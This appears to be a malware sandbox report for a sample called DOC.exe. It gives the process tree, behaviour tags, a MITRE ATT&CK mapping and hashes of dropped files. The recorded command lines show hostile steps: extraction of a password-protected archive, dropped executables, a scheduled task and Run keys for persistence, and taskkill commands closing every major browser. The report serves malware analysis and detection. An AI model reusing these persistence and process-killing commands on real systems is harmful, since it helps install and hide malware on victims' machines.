C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:14⤵PID:956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:14⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:84⤵PID:1816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:14⤵PID:540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:14⤵PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5128 /prefetch:84⤵PID:4616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:14⤵PID:4168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:4568
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\Startup\DOC.exe"C:\Users\Admin\AppData\Local\Temp\Startup\DOC.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe"C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:4572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn MRIYKG.exe /tr C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe /sc minute /mo 15⤵
- System Location Discovery: System Language Discovery
PID:2568 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MRIYKG.exe /tr C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe /sc minute /mo 16⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2212
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\MRIYKG.vbs5⤵
- System Location Discovery: System Language Discovery
PID:3588
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5084
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1028
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2704
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2044
-
C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exeC:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1884
-
C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exeC:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4804
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD5e443ee4336fcf13c698b8ab5f3c173d0
SHA19bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA25679e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd
-
Filesize
5KB
MD5a389c58f840538ffbd367d9edf53cd8a
SHA1c39d01f7bb8e5074ce8c3fb757f5a076b8170e5e
SHA256a31b609f57b221b940eaa5ad84f24bd5088f920ab607627c972d73666b63b0d2
SHA5126a6bc2e73785898b4ef18d438263a36de3f0e7972668101752e14b6befdf54ec3dceb871bbd42fb66ac7b399a6f893b91c4bfc711eebafa215e3422a4f1a24d5
-
Filesize
6KB
MD5bef3f7517fd637f08702fc1949511cb8
SHA18cefcda8e396d051b634ed82ceed8bc461bd89e6
SHA2569cb4f5837ce399920371d2e07a29b5dd1b4e2e9d4e4c58d807067a0643ff9c54
SHA5124a64069ec420e0c73467ff925fb951e433f736a0cb3d9c331fabbe86c4e2f5bac26bdbcc70db7acb62644f809bda41a05a9cc644b3cd6cb34e2f987578e767d2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5a5ad918c986d27afec5f09a4a9c7c364
SHA16072fb84ef594e0fc6076d38715aad853e063ee2
SHA256810f60de7fc75441cf5e522ecb981a126521c58866f65a296b8a0283b3525725
SHA512f734e998a65dd22e44a2e02b12c15c26533b2a56911befe5e41a1d02f3c670c2e4de628255a6ae067ea7d39c71fedda28888d5209744b2382331e5094a2fe26c
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize4KB
MD5cc810e3f9121376d1b79158cbe8cecfd
SHA11c4055dfce45dd8826540d09442fbac85ee46649
SHA25644d22a788b83c4c46980ab726132f0e5fa1c30ebf15f6ce81d7396916e775889
SHA512e8e8956fa4b0a38ed1934f2560e94a152f2ad8bc5d3936712a95624d57ea1e189de60e1aa453eb8507699581a74a20f55fc3c3ac930aa14296a0f60d497d1992
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
1KB
MD5388dd3faca59631a0e1373dc088f6ab3
SHA1b37fd28b368364584a3561eb39f25aeb3a426f6e
SHA256e17a39522e1d48c6c6eb71290ca5c32f283de7b6c9367ed44a29155168f11bb1
SHA512a124edec11fb0d492de7aa90703ba18537b3189f8d680a9316ac2d1983a1b60dfc6b5d246f0044c09583db9f259403782d87987fcbd96c2bf3a33376a19635f8
-
Filesize
944B
MD55aedc324791c152dbe2855e534991c3c
SHA13f8ecd8cbcbd9abb6c3ee4abce5e4ecf929fedf7
SHA256a29256d13aada8ff63532405f5d36610fc565e76f1c1bda347ed9d37e0ee8386
SHA512f945f492b1e7955fe900768a1609b528c2bc8a9afe668343096fe6cd38fbd7cd52ba41ff86d1ea559bbf6faeb3084198f5be266c3136100c3764b037afa71135
-
Filesize
935KB
MD5a1d37a2a0a4cd5038e129946ee935868
SHA187042fbecf1558a2e974c6ad045584f23e1ac7c9
SHA2569988b0297ad8be4bd3c559437176eaca54cdc36593728967395c4dee21fc898c
SHA512eb6cfcc7b1c526c06737dc6187af4f65bdd178ffc951cf8bb13571b44cc2c3c0cd051c6e9b4930433f8e6830420a04e0b538d353dd86a1fefb0663032c37c03c
-
Filesize
27KB
MD50b229a3daa9de8f2d404888db6c0ac25
SHA1c589ebe787ef18fcb354cc9ac0cf9de7730e3310
SHA256ffa4e02231acf2cd8a132a365a7947d8734eb712da1aa2f524b89905cf4dfb49
SHA5120b56945023b3e09c6d3358660f10ebaad0d7d9fd191a1424add370c86ed376a8d983d81ed01a5b4c5cb7067d6c78a6c5883f5820b8aff37997228844085aa45d
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
842B
MD56ebd7b6ae7b0ec775744d0bc88c1ee56
SHA127724aad404db1c8ad3b60bb675ad33ab97f24dd
SHA25658cc7247b20ae7b181bbf4f9078665a7989750c897d073d3d2f1227945e54fe6
SHA512e8e2996a6aa46733cd6973dd3b70be65df428ad413504892cbc4136fb5e458843ca928fc2b70ee3560855db3bea7b0a09fc07a1d17a3e7e4cb9c3225ddd803f3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD51d2237faf8e6198625010cb580280901
SHA1592449bddf763bb63c22f638cb42f71484f87f06
SHA25678643b903379276085c5ef0092afc5c10dee821c5754e01bc8ef835907b16ac4
SHA5128abe1ff967d92c663080caf54f315e534ea296c91474d66cd327dccc38a3aa8685101649bb120e28f1438011596dde4f2f83e8150c90d51529efce9906a5aa0b
-
Filesize
1.2MB
MD59353cd481543e4fcf91e2c770fbcfefb
SHA1a29a232bc73842cb11d87dc906747a55cc9ed27d
SHA2569c2ab47b11c7c94a4f2416030f6383b235baf30770881ba91e7d6534610a5cd5
SHA512827e1e0c0ed0b664b2232fc28444476a9f28f2df0ebe4638d93c183684b9fcdab26c26d5c1374146d8d50d13757408ceabc1ccffb616913cb8ced08dc0d2d3a2